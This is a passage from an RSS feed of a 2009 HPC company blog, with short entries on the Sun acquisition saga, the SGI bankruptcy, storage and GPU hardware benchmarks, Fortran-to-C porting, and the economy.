      <description>As John West points out over at InsideHPC.com, the FAQ really didn&amp;rsquo;t live up to FAQ standards &amp;hellip; very little was answered, and there are many more questions. But a pattern did emerge, that fundamentally suggests that we may have been (more) right (than we knew). This acquisition was about MySQL and Java. And other software bits. But no mention of Lustre, and even more important to a larger number of HPC sites, GridEngine.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-04-21</title>
      <link>https://blog.scalability.org/2009/04/twitter-updates-for-2009-04-21/</link>
      <pubDate>Tue, 21 Apr 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/twitter-updates-for-2009-04-21/</guid>
      <description>* The Sun has set: acquired by Oracle after messing up IBM acquisition. Hardware and HPC probably gone. Its Java Larry wanted. [#](http://twitter.com/sijoe/statuses/1565006452)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Game over:  Sun snarfed up by Oracle</title>
      <link>https://blog.scalability.org/2009/04/game-over-sun-snarfed-up-by-oracle/</link>
      <pubDate>Mon, 20 Apr 2009 11:23:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/game-over-sun-snarfed-up-by-oracle/</guid>
      <description>See the PR. Oh my. Imagine one of several scenarios. Scenario 1: All other hardware vendors drop Oracle certification efforts and cease selling Oracle on their platforms as Oracle hasn&amp;rsquo;t stopped directly competing with them.
Scenario 2: Sun hardware largely goes bye-bye, en masse, so Oracle can focus upon the bits that make sense for its business, and not piss its partners off too badly. I am guessing it is going to wind up much closer to 2 than to 1.</description>
    </item>
    
    <item>
      <title>&#34;Customer service&#34;</title>
      <link>https://blog.scalability.org/2009/04/customer-service/</link>
      <pubDate>Sun, 19 Apr 2009 02:37:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/customer-service/</guid>
      <description>Names not used to protect the guilty. We have a motherboard that we bought about 2 years ago now. It was used to run 5310 processors for a build machine for a while. Well, the first motherboard we had from them, while advertised as compatible with quad core &amp;hellip; wasn&amp;rsquo;t. We had to RMA it to get the right version from this vendor. Well, we had to upgrade the BIOS recently to support a new card we placed in the machine.</description>
    </item>
    
    <item>
      <title>Extra Extra read all about it ... VC deals in Michigan plummet 70%!</title>
      <link>https://blog.scalability.org/2009/04/extra-extra-read-all-about-it-vc-deals-in-michigan-plummet-70/</link>
      <pubDate>Sat, 18 Apr 2009 20:49:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/extra-extra-read-all-about-it-vc-deals-in-michigan-plummet-70/</guid>
      <description>Yeah &amp;hellip; that&amp;rsquo;s what is being reported in the Freep. I haven&amp;rsquo;t looked at the latest MoneyTree numbers from PWC, but from what the author reports,
Yup. You got it. And more to the point, all of the &amp;ldquo;big winners&amp;rdquo; here &amp;hellip; are already funded companies. That is, new company formation, with a VC/Angel assist, is not happening at a pace worthy of mentioning. Specifically
I think they call this &amp;hellip; the long tail.</description>
    </item>
    
    <item>
      <title>I think the fat lady has begun to sing ... IBM rejected Sun&#39;s overtures to restart discussions</title>
      <link>https://blog.scalability.org/2009/04/i-think-the-fat-lady-has-begun-to-sing-ibm-rejected-suns-overatures-to-restart-discussions/</link>
      <pubDate>Sat, 18 Apr 2009 11:38:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/i-think-the-fat-lady-has-begun-to-sing-ibm-rejected-suns-overatures-to-restart-discussions/</guid>
      <description>Yeah, this is sounding more and more like a Yahoo-redux. So who will play the part of Jerry Yang? According to a report from the Triangle Business Journal,
The journal was summarizing a CNBC report, which I hadn&amp;rsquo;t seen. In these cases, played out in public, unless one party gives a good reason for not resuming negotiating, they are basically holding out to see what the other party will sweeten the deal with.</description>
    </item>
    
    <item>
      <title>A bit of traffic ... for Pegasus!</title>
      <link>https://blog.scalability.org/2009/04/a-bit-of-traffic-for-pegasus/</link>
      <pubDate>Thu, 16 Apr 2009 23:36:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/a-bit-of-traffic-for-pegasus/</guid>
      <description>Someone was apparently looking at our Pegasus GPU+Cell box specs online &amp;hellip; and told their friends. Most of the comments were ok, though someone thinks this is not a deskside/desktop box. They wrote:
Heh &amp;hellip; Won&amp;rsquo;t dispute the low production piece &amp;hellip; we are not making millions of them. As for a desktop computer? That is most assuredly what this is. See for yourself &amp;hellip; Now imagine throwing even more cores and GPUs at it.</description>
    </item>
    
    <item>
      <title>cluster top</title>
      <link>https://blog.scalability.org/2009/04/cluster-top/</link>
      <pubDate>Thu, 16 Apr 2009 22:24:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/cluster-top/</guid>
      <description>Well, I wrote a cluster top a while ago, and just installed it for a customer whose cluster we are burning in right now. This is an office cluster &amp;hellip; 48 cores, has to be pretty darned silent, as it is going into an office environment. The user needs to see what&amp;rsquo;s running on the cluster. Top is a great interface to this. ctop is getting better.
ctop v0.25: by Scalable Informatics	http://www.</description>
    </item>
    
    <item>
      <title>Reuters on Sun &#43; IBM : &#34;No we really want to be courted&#34;</title>
      <link>https://blog.scalability.org/2009/04/reuters-on-sun-ibm-no-we-really-want-to-be-courted/</link>
      <pubDate>Thu, 16 Apr 2009 10:18:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/reuters-on-sun-ibm-no-we-really-want-to-be-courted/</guid>
      <description>Yahoo news points to an article on Reuters news service, where it quotes unnamed people familiar with the situation. Very short article, looks more like a backchannel communication method saying &amp;ldquo;come back, we really do want you to court us&amp;rdquo;. I would imagine that some shareholders &amp;hellip; er &amp;hellip; expressed their positions, rather emphatically &amp;hellip; to Sun&amp;rsquo;s board. I am sure quite a bit of heat was generated, until the relevant people saw the light.</description>
    </item>
    
    <item>
      <title>Rendezvous in Paris</title>
      <link>https://blog.scalability.org/2009/04/rendevous-in-paris/</link>
      <pubDate>Wed, 15 Apr 2009 11:08:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/rendevous-in-paris/</guid>
      <description>I could say that using a JackRabbit for high performance storage is sorta like this &amp;hellip; :)
Something like this is on my mind when I write about our test tracks, and cracking the throttle wide open.</description>
    </item>
    
    <item>
      <title>10,000 drives for 80 GB/s?</title>
      <link>https://blog.scalability.org/2009/04/10000-drives-for-80-gbs/</link>
      <pubDate>Wed, 15 Apr 2009 00:29:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/10000-drives-for-80-gbs/</guid>
      <description>Just read this today at the Reg. Argonne has lots of GPUs, and disks. Separated with a big old IB fabric. Hmmm&amp;hellip;. 10,000 disks to get 80,000,000,000 B/s. Hmmm&amp;hellip;. Delivering that to GPUs. Hmmm&amp;hellip;. I think we can do better.
Just 80 of our JR4 units can certainly read and write at that speed, and we can get them 2 GPUs in the same box as the disks. 160 GPUs (Teslas at that).</description>
    </item>
    
    <item>
      <title>Supercomputing as a Service:  meet Eka</title>
      <link>https://blog.scalability.org/2009/04/supercomputing-as-a-service-meet-eka/</link>
      <pubDate>Mon, 13 Apr 2009 17:42:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/supercomputing-as-a-service-meet-eka/</guid>
      <description>In this article, the author covers some of what CRL is doing with Eka (pronounced eh-kch). There are some interesting points:
Not sure I agree that it is the first time a corporate institution is doing this &amp;hellip; others have been there before, and some are continuing, such as Tsunamic Technologies. This said, the other point is very much on target.
Most of the governmental backed/based HPC providers are doing so, specifically to further their research.</description>
    </item>
    
    <item>
      <title>Interesting results on potential windows 7 uptake</title>
      <link>https://blog.scalability.org/2009/04/interesting-results-on-potential-windows-7-uptake/</link>
      <pubDate>Mon, 13 Apr 2009 16:47:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/interesting-results-on-potential-windows-7-uptake/</guid>
      <description>Of course, this is all premature &amp;hellip; windows 7 could turn out to be the greatest thing since sliced bread &amp;hellip; though honestly, I doubt it. Information week reports that 83% of corporate customers do not plan a windows 7 deployment in the first year of availability. Moreover, most are &amp;hellip; happy &amp;hellip; with XP, and will continue to use it, as they are concerned with application compatibility.
That is quite interesting, but not terribly surprising.</description>
    </item>
    
    <item>
      <title>So here is the fortran90 with C problem</title>
      <link>https://blog.scalability.org/2009/04/so-here-is-the-fortran90-with-c-problem/</link>
      <pubDate>Sun, 12 Apr 2009 12:59:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/so-here-is-the-fortran90-with-c-problem/</guid>
      <description>This is the example I concocted to help demonstrate the problem and help me learn how to solve it. The problem is, I solved this &amp;hellip; without any fancy interface blocks or anything strange like that. Go figure.
The makefile
&amp;lt;code&amp;gt;
CC	= icc
FC	= ifort
LD	= ifort
CFLAGS	= -g
FFLAGS	= -g
LFLAGS	= -g
all:	test.exe
test.exe:	test_f.o test_c.o
	$(LD) $(LFLAGS) test_f.o test_c.o -o test.exe
test_f.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-04-12</title>
      <link>https://blog.scalability.org/2009/04/twitter-updates-for-2009-04-12/</link>
      <pubDate>Sun, 12 Apr 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/twitter-updates-for-2009-04-12/</guid>
      <description>* Dealing with a very reluctant Fortran90 to C under MPI interface, in preparation for a Cuda port of the C. Mostly done. Array issues... [#](http://twitter.com/sijoe/statuses/1500062985)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>The $7B question ... that IBM asked</title>
      <link>https://blog.scalability.org/2009/04/the-7b-question-that-ibm-asked/</link>
      <pubDate>Sun, 12 Apr 2009 01:14:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/the-7b-question-that-ibm-asked/</guid>
      <description>In a Register article, Gavin Clarke asks the obvious questions, and doesn&amp;rsquo;t seem to think the answers are all that great.
Not so sure that&amp;rsquo;s what killed the deal, or if the deal is really dead. No, I have no inside information. I speculate that someone was playing a game of brinksmanship and managed to scupper the deal in front of them. It is still possible to do a deal, but it is going to come in quite a bit less than before.</description>
    </item>
    
    <item>
      <title>On the perceived danger of open source</title>
      <link>https://blog.scalability.org/2009/04/on-the-perceived-danger-of-open-source/</link>
      <pubDate>Sat, 11 Apr 2009 02:45:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/on-the-perceived-danger-of-open-source/</guid>
      <description>A blog post was written making the argument that, as pricing dropped, so did quality, in software, in patents, in pretty much everything covered. The author suggested that open source will be, effectively, the death of the software industry. Not to mention burying Sun Microsystems. Ok &amp;hellip; I could fisk the post, but it&amp;rsquo;s better just to note that too many things are being conflated and confused in the article &amp;hellip; it would take less time to simply point out reality than try to correct what I saw.</description>
    </item>
    
    <item>
      <title>Some losses are more painful than others</title>
      <link>https://blog.scalability.org/2009/04/some-losses-are-more-painful-than-others/</link>
      <pubDate>Fri, 10 Apr 2009 18:50:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/some-losses-are-more-painful-than-others/</guid>
      <description>We lost our second bid in a week. I&amp;rsquo;ve been trying to figure out why (which is why I often fight a quixotic battle to get information about why we lose when we do). This one was painful as it was at one of my alma maters. So, when we generate pricing for configurations, we use our latest and greatest pricing data from our suppliers. What if, I dunno &amp;hellip; a) the pricing was out of date, and b) the new pricing was much lower than the old pricing?</description>
    </item>
    
    <item>
      <title>[comes up for air] GULP [...]</title>
      <link>https://blog.scalability.org/2009/04/comes-up-for-air-gulp/</link>
      <pubDate>Thu, 09 Apr 2009 22:51:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/comes-up-for-air-gulp/</guid>
      <description>That was intense. Doug is driving the proposal to Fedex, with minutes to spare before the cutoff. I just love RFPs. No &amp;hellip; really. All the long tedious forms &amp;hellip; and the forms &amp;hellip; did I mention the forms &amp;hellip; and the signatures &amp;hellip; and the forms &amp;hellip; forms &amp;hellip; This is why I have been silent for a few days. My apologies. Will try to catch up tomorrow.</description>
    </item>
    
    <item>
      <title>Curiouser and curiouser ...</title>
      <link>https://blog.scalability.org/2009/04/curiouser-and-curiouser/</link>
      <pubDate>Wed, 08 Apr 2009 00:05:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/curiouser-and-curiouser/</guid>
      <description>So we all &amp;ldquo;know&amp;rdquo; the prospective fate of SGI &amp;hellip; assets to be sold for a song to Rackable, employees let go &amp;hellip; equity shareholders left holding effectively nothing. What&amp;rsquo;s odd is that outstanding equity shares haven&amp;rsquo;t been canceled yet. At some point, this suggests that there will be an exchange &amp;hellip; X SGIC shares for 1 share of RACK. But that&amp;rsquo;s not the curious thing. This is.
Last Friday, an order was entered which gave effective veto power to SGIC for any sale of equity over a very specific amount.</description>
    </item>
    
    <item>
      <title>sooo close ... sooo close</title>
      <link>https://blog.scalability.org/2009/04/sooo-close-sooo-close/</link>
      <pubDate>Tue, 07 Apr 2009 21:56:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/sooo-close-sooo-close/</guid>
      <description>Dealing with a strange parameter passing/indexing thingy. Something ain&amp;rsquo;t quite right. Passing allocatable arrays from F90 to C, check. Passing the array metadata (bounds), check. Getting the pointer arithmetic correct (I think), check. Getting the C version of this computational kernel prepped for Cuda-izing? Priceless. Well, ok, not really priceless. Part of a porting service.</description>
    </item>
    
    <item>
      <title>As the economic situation takes its toll ... Isilon trims staff</title>
      <link>https://blog.scalability.org/2009/04/as-the-economic-situation-takes-its-toll-isilon-trims-staff/</link>
      <pubDate>Tue, 07 Apr 2009 12:13:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/as-the-economic-situation-takes-its-toll-isilon-trims-staff/</guid>
      <description>Saw this, this morning on the Reg. The CEO blames the economy. Doesn&amp;rsquo;t surprise me, Isilon kit isn&amp;rsquo;t cheap, and there is something of a spending freeze going on in the economy.</description>
    </item>
    
    <item>
      <title>Alrighty then ... (cooking with fire)</title>
      <link>https://blog.scalability.org/2009/04/alrighty-then-cooking-with-fire/</link>
      <pubDate>Tue, 07 Apr 2009 01:09:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/alrighty-then-cooking-with-fire/</guid>
      <description>Figured out the allocatable array to C passing issue. Now I need to pass the dimensions. Long story, punchline is that Fortran preserves array metadata in its calls with pointers back to its metadata entries in symbol tables (or even with the data itself). C &amp;hellip; not so much. More hack work to make it work, and then we can get to the Cuda portion of the port &amp;hellip; Wahooo!</description>
    </item>
    
    <item>
      <title>Monday morning, an hour before the markets open ...</title>
      <link>https://blog.scalability.org/2009/04/monday-morning-an-hour-before-the-markets-open/</link>
      <pubDate>Mon, 06 Apr 2009 11:59:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/monday-morning-an-hour-before-the-markets-open/</guid>
      <description>And Sun (NASDAQ: JAVA) is already down quite a bit.</description>
    </item>
    
    <item>
      <title>Why can&#39;t banks just pay back the TARP money if they don&#39;t need it?</title>
      <link>https://blog.scalability.org/2009/04/why-cant-banks-just-pay-back-the-tarp-money-if-they-dont-need-it/</link>
      <pubDate>Mon, 06 Apr 2009 11:46:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/why-cant-banks-just-pay-back-the-tarp-money-if-they-dont-need-it/</guid>
      <description>Makes sense &amp;hellip; right? If a bank doesn&amp;rsquo;t need it, it should give it back, with interest. This is what we want. It is the right thing to do. Unless there is something else going on.
Ummm &amp;hellip; er &amp;hellip; ah &amp;hellip;</description>
    </item>
    
    <item>
      <title>Market recovery, dead cat bounce, or ... worse ???</title>
      <link>https://blog.scalability.org/2009/04/market-recovery-dead-cat-bounce-or-worse/</link>
      <pubDate>Mon, 06 Apr 2009 04:41:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/market-recovery-dead-cat-bounce-or-worse/</guid>
      <description>Once, a long while ago, back during my SGI days, SGI had been pummeled for missing our numbers one quarter. There was a brief rally, someone asked if we had turned things around. Experienced commentators talked about how even &amp;ldquo;dead cats bounce&amp;rdquo;. Not exactly the most pleasant of images, but there it was. Obviously, you know how that story turned out. I raise this situation now, as there has been a market rally over the past few days.</description>
    </item>
    
    <item>
      <title>New weather event tonight/tomorrow</title>
      <link>https://blog.scalability.org/2009/04/new-weather-event-tonighttomorrow/</link>
      <pubDate>Mon, 06 Apr 2009 01:00:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/new-weather-event-tonighttomorrow/</guid>
      <description>6+ inches of snow (15cm for those using sane units) expected. Of course, the last time they predicted snow, we got 45 degree sun-shining days. Unfortunately, they appear to be right this time.
[ ](http://www.accuweather.com/radar-large.asp?partner=forecastfox&amp;amp;traveler=0&amp;amp;site=MI_&amp;amp;type=SIR&amp;amp;anim=0&amp;amp;level=state&amp;amp;large=1)</description>
    </item>
    
    <item>
      <title>Ok, classify this one as &#34;fun&#34;</title>
      <link>https://blog.scalability.org/2009/04/ok-classify-this-one-as-fun/</link>
      <pubDate>Mon, 06 Apr 2009 00:52:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/ok-classify-this-one-as-fun/</guid>
      <description>Q: When is an array not an array? A: When it is a Fortran90 allocatable array, and you are pulling out your remaining (&amp;amp;^&amp;amp;$#% hair trying to pass it to a C routine.
Ok, I have found some hope, appealing to some F2003 bits which this compiler supports. But still &amp;hellip; the most likely scenario is that I have to create an array of pointers to get to the data &amp;hellip; which means that we are likely to have some memory performance hit.</description>
    </item>
    
    <item>
      <title>Breaking: IBM pulls bid for Sun</title>
      <link>https://blog.scalability.org/2009/04/breaking-ibm-pulls-bid-for-sun/</link>
      <pubDate>Sun, 05 Apr 2009 22:56:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/breaking-ibm-pulls-bid-for-sun/</guid>
      <description>Not sure if someone else is offering more. Sun apparently said they didn&amp;rsquo;t want to be negotiating exclusively with IBM, so IBM yanked the bid. I expect Sun&amp;rsquo;s shares (NASDAQ: JAVA) to plummet in the morning, unless they announce their new suitor. Shades of Yahoo+Microsoft. Someone on the Yahoo side did a really bad thing by their shareholders. And got fired for it. [update] More at WSJ. Sun&amp;rsquo;s board rejected the offer as too low.</description>
    </item>
    
    <item>
      <title>Ran BenchmarkSQL on &#34;Velocibunny&#34;</title>
      <link>https://blog.scalability.org/2009/04/ran-benchmarksql-on-velocibunny/</link>
      <pubDate>Sat, 04 Apr 2009 01:10:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/ran-benchmarksql-on-velocibunny/</guid>
      <description>So Velocibunny now has a shiny new set of 5502 Nehalem CPUs in it, 12 GB ram, and 24 SSDs. For laughs, I ran BenchmarkSQL on it. Ok, not for laughs, but the folks who were originally all hot and bothered to run on it sort of disappeared, so I had to come up with some benchmark tests. Oddly enough, BenchmarkSQL was written by one of them. Go figure. I am attempting to understand, in the simplest possible classification scenario, what a good score is and what a bad score is.</description>
    </item>
    
    <item>
      <title>Forbes on IBM&#43;Sun:  There will be blood</title>
      <link>https://blog.scalability.org/2009/04/forbes-on-ibmsun-there-will-be-blood/</link>
      <pubDate>Fri, 03 Apr 2009 15:01:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/forbes-on-ibmsun-there-will-be-blood/</guid>
      <description>John West at InsideHPC comments and links to a Forbes article with a gedanken experiment. The net of this is that huge swaths of Sun offerings would be EOLed. Huge swaths. Which is similar to what John and I said in separate articles. The Forbes article notes something that should give customers some pause:
We agree. This would end a proprietary product, with no real chance of followon going forward. One of the huge dangers in any IT purchase is the possibility of an un-recoverable bricking at some point.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-04-02</title>
      <link>https://blog.scalability.org/2009/04/twitter-updates-for-2009-04-02-2/</link>
      <pubDate>Thu, 02 Apr 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/twitter-updates-for-2009-04-02-2/</guid>
      <description>* @[herrold](http://twitter.com/herrold) Yes.... she&#39;s dead Jim ... this time, it looks like for real. The zombie doesn&#39;t look like its going to walk any time soon [in reply to herrold](http://twitter.com/herrold/statuses/1431586144) [#](http://twitter.com/sijoe/statuses/1435454318)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>More about the SGI bankruptcy</title>
      <link>https://blog.scalability.org/2009/04/more-about-the-sgi-bankruptcy/</link>
      <pubDate>Thu, 02 Apr 2009 00:00:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/more-about-the-sgi-bankruptcy/</guid>
      <description>I didn&amp;rsquo;t have access to all the information (and still don&amp;rsquo;t), just what seeps out in reports. Here is a good report, which suggests that this might not be as pretty a face (and it wasn&amp;rsquo;t pretty) as SGI suggested in its customer letter. Critical aspects not mentioned in public until now appear to be
I had heard it was shopping itself around. But what real value did it have? And what about its liabilities?</description>
    </item>
    
    <item>
      <title>Mastering Cat ... finally the book we all need ...</title>
      <link>https://blog.scalability.org/2009/04/mastering-cat-finally-the-book-we-all-need/</link>
      <pubDate>Wed, 01 Apr 2009 18:55:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/mastering-cat-finally-the-book-we-all-need/</guid>
      <description>Here is the link. Enjoy. (Hat tip: Andrew at Tuxtone)</description>
    </item>
    
    <item>
      <title>ScaleMP steps up to fill the void left by SGI</title>
      <link>https://blog.scalability.org/2009/04/scalemp-steps-up-to-fill-the-void-left-by-sgi/</link>
      <pubDate>Wed, 01 Apr 2009 17:18:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/scalemp-steps-up-to-fill-the-void-left-by-sgi/</guid>
      <description>Shai Fultheim at ScaleMP just sent me a quick note. Here it is reproduced below. With the recent announcement of SGI&amp;rsquo;s (NASDAQ:SGIC) acquisition by Rackable Systems (NASDAQ:RACK), ScaleMP is announcing immediate availability of a migration package for existing SGI Altix customers. ScaleMP&amp;rsquo;s vSMP Foundation offers shared-memory systems of up to 4TB and 128 cores, and is available from multiple hardware partners. The recent product expansion to support Nehalem processors as well as multi-rail InfiniBand makes vSMP Foundation an excellent replacement for existing SGI customers.</description>
    </item>
    
    <item>
      <title>SGI is done and sold (heard this rumor yesterday)</title>
      <link>https://blog.scalability.org/2009/04/sgi-is-done-and-sold-heard-this-rumor-yesterday/</link>
      <pubDate>Wed, 01 Apr 2009 11:55:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/sgi-is-done-and-sold-heard-this-rumor-yesterday/</guid>
      <description>[updated] see bottom: SGI will be acquired by Rackable. This said, read the press release. Specifically the portion that indicates that
Yes, this is right (and assuming it is not an April Fools&amp;rsquo; joke), this means SGI filed for bankruptcy this morning. They had a looming $5M payment due last Friday to Morgan Stanley. I was searching for information as to whether or not they had made that payment, as I thought that MS might force them into a chapter 7, and sell off their assets.</description>
    </item>
    
    <item>
      <title>And thus it begins ...</title>
      <link>https://blog.scalability.org/2009/04/and-thus-it-begins/</link>
      <pubDate>Wed, 01 Apr 2009 11:37:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/04/and-thus-it-begins/</guid>
      <description>Please post em if you find em. I suspect it will be a busy news day &amp;hellip; First up: Breaking news, IBM buys Linus Torvalds Second: Turnkey Linux abandons Linux, and becomes Turnkey Windows. I&amp;rsquo;ll update em as I find em.</description>
    </item>
    
    <item>
      <title>Auto industry?  What auto industry?</title>
      <link>https://blog.scalability.org/2009/03/auto-industry-what-auto-industry/</link>
      <pubDate>Mon, 30 Mar 2009 14:28:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/auto-industry-what-auto-industry/</guid>
      <description>Here in Detroit, we have the big 3 &amp;hellip; Ford, GM, and Chrysler. Well, maybe no longer. This morning the government passed judgment on this industry, which had been requesting capital to survive, as the credit markets, despite protestations to the contrary from various sources, are still frozen &amp;hellip; and they (and all other businesses) need capital (and credit) to survive. The government has said (basically) &amp;hellip; it&amp;rsquo;s Chapter 11 (or 7) for you.</description>
    </item>
    
    <item>
      <title>So who, exactly, is responsible for the meltdown on Wall Street?</title>
      <link>https://blog.scalability.org/2009/03/so-who-exactly-is-responsible-for-the-meltdown-on-wall-street/</link>
      <pubDate>Sat, 28 Mar 2009 17:45:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/so-who-exactly-is-responsible-for-the-meltdown-on-wall-street/</guid>
      <description>I saw a link to this today. In it there are some juicy bits. Like this:
Hmmm &amp;hellip;.
Ok &amp;hellip; what is Glass-Steagall?
What went wrong was that the housing bubble, which was quite speculative in Florida and Las Vegas, burst. Elsewhere, we had unsustainable growth in &amp;ldquo;value&amp;rdquo; of housing. But this story is &amp;hellip; well &amp;hellip; prescient &amp;hellip; and not in a good way &amp;hellip;
Ok, that&amp;rsquo;s just plain old scary.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-03-25</title>
      <link>https://blog.scalability.org/2009/03/twitter-updates-for-2009-03-25/</link>
      <pubDate>Wed, 25 Mar 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/twitter-updates-for-2009-03-25/</guid>
      <description>* @[insideHPC](http://twitter.com/insideHPC) Volume rules. This is why HPC is, and must, go down market, to desktops. And why accelerators are so important. [in reply to insideHPC](http://twitter.com/insideHPC/statuses/1381719127) [#](http://twitter.com/sijoe/statuses/1381741850) * @[herrold](http://twitter.com/herrold) You should tell you quant friend that we (scalable) are well on our way to 16 GPUs per machine. Currently max 8. Pegasus-gpu [#](http://twitter.com/sijoe/statuses/1382043143)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Cool announcement tomorrow ...</title>
      <link>https://blog.scalability.org/2009/03/cool-announcement-tomorrow/</link>
      <pubDate>Wed, 25 Mar 2009 01:42:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/cool-announcement-tomorrow/</guid>
      <description>:)</description>
    </item>
    
    <item>
      <title>Ok, fixed the over-zealous tweeting ...</title>
      <link>https://blog.scalability.org/2009/03/ok-fixed-the-over-zealous-tweeting/</link>
      <pubDate>Wed, 25 Mar 2009 01:40:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/ok-fixed-the-over-zealous-tweeting/</guid>
      <description>One blog post per tweet is a fast way to get a social networking echo chamber (or feedback loop).</description>
    </item>
    
    <item>
      <title>First, pre-tuning numbers for the *small* &#34;velocibunny&#34;</title>
      <link>https://blog.scalability.org/2009/03/first-pre-tuning-numbers-for-the-small-velocibunny/</link>
      <pubDate>Wed, 25 Mar 2009 01:37:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/first-pre-tuning-numbers-for-the-small-velocibunny/</guid>
      <description>Ok, I know you have been asking &amp;hellip; What is a &amp;ldquo;velocibunny&amp;rdquo;? Think of it as &amp;hellip; um &amp;hellip; a very very fast JackRabbit. Not that JackRabbit isn&amp;rsquo;t fast &amp;hellip; it appears to be best in its class in performance. But &amp;ldquo;velocibunny&amp;rdquo; is faster. A lot faster. How fast and what workloads?
It is specifically designed to be usable as a very fast database engine. As in PostgreSQL and related. Now mind you, it is in lab with the first iteration of an OS load, and **NO TUNING**. This is &amp;ldquo;build the RAID10 out of the box and start using it with a base load&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>@herrold You should tell you q...</title>
      <link>https://blog.scalability.org/2009/03/herrold-you-should-tell-you-q/</link>
      <pubDate>Tue, 24 Mar 2009 14:44:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/herrold-you-should-tell-you-q/</guid>
      <description>@herrold You should tell you quant friend that we (scalable) are well on our way to 16 GPUs per machine. Currently max 8. Pegasus-gpu</description>
    </item>
    
    <item>
      <title>@insideHPC Volume rules.  This...</title>
      <link>https://blog.scalability.org/2009/03/insidehpc-volume-rules-this/</link>
      <pubDate>Tue, 24 Mar 2009 13:43:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/insidehpc-volume-rules-this/</guid>
      <description>@insideHPC Volume rules. This is why HPC is, and must, go down market, to desktops. And why accelerators are so important.</description>
    </item>
    
    <item>
      <title>@herrold 2nd derivative is cur...</title>
      <link>https://blog.scalability.org/2009/03/herrold-2nd-derivative-is-cur/</link>
      <pubDate>Tue, 24 Mar 2009 01:59:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/herrold-2nd-derivative-is-cur/</guid>
      <description>@herrold 2nd derivative is curvature, how quickly the slope changes. Sadly it looks like it is changing in the wrong direction.</description>
    </item>
    
    <item>
      <title>We built most of &#34;Velocibunny&#34;...</title>
      <link>https://blog.scalability.org/2009/03/we-built-most-of-velocibunny/</link>
      <pubDate>Tue, 24 Mar 2009 01:58:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/we-built-most-of-velocibunny/</guid>
      <description>We built most of &amp;ldquo;Velocibunny&amp;rdquo; today. The x5492&amp;rsquo;s didn&amp;rsquo;t work, so we used 5310&amp;rsquo;s. This was the fastest RAID build I have ever seen &amp;hellip;</description>
    </item>
    
    <item>
      <title>The economy&#39;s toll ...</title>
      <link>https://blog.scalability.org/2009/03/the-economys-toll/</link>
      <pubDate>Mon, 23 Mar 2009 22:07:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/the-economys-toll/</guid>
      <description>I read today about the Ann Arbor News going out of the atom-pushing business, and getting into the bit-pushing business. Given that most newspapers are advertisement-supported, and Google has eaten most everyone&amp;rsquo;s lunch on advertising &amp;hellip; this isn&amp;rsquo;t a guaranteed strategy by any measure. I wish them luck. But that isn&amp;rsquo;t what caught my eye. It&amp;rsquo;s the unemployment rate, and its first derivative (i.e. slope), in Michigan.</description>
    </item>
    
    <item>
      <title>More about the Sun-IBM thing</title>
      <link>https://blog.scalability.org/2009/03/more-about-the-sun-ibm-thing/</link>
      <pubDate>Sun, 22 Mar 2009 17:22:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/more-about-the-sun-ibm-thing/</guid>
